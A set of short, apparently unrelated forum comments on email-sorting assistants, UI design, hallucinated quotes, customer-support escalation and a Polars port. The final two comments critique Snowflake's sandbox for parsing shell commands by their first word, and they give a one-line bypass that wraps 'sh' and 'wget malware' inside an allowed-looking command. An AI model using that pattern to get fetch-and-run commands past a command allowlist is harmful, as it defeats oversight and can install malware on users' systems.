this is the approach that actually makes sense to me. gradual trust not yolo from day one. curious though, can you see what it learned about your patterns or is it a black box? like if it starts auto-archiving something you actually wanted, how do you debug that
honestly sorting email is the one thing that should have been solved five years ago. the tech is fine for classification. the problem is nobody wants to build a boring email sorter when you can announce an autonomous life assistant
The circular drag ones are genuinely worse than most of the joke submissions. At least the joke ones fail immediately. The knob UI works just well enough that you keep trying for 30 seconds before giving up.
I think it's the fluency. Other tools fail visibly. A bad search result looks like a bad search result. A hallucinated quote reads exactly like a real one. There's no signal in the output itself that something is wrong. You have to go back to the source to check, and the whole point of using the tool was to not have to do that.
The real issue is that L2/L3 barely exists anymore. L1 scripts I can deal with. But when escalation just loops you back to the same script read by someone else, that's where it breaks.
The author posted a Polars version in the comments and almost nobody noticed. Meanwhile the top comments are still asking for it. Building something useful and having people ignore what you made to request what you already made is a special kind of frustration.
Everyone in this thread is dunking on Snowflake's sandbox design but the real issue is simpler. They parsed shell commands by looking at the first word. cat = safe. Socat < <(sh < <(wget malware)) = safe
This is not an AI problem. This is a 1990s input validation problem wearing a 2026 hat lol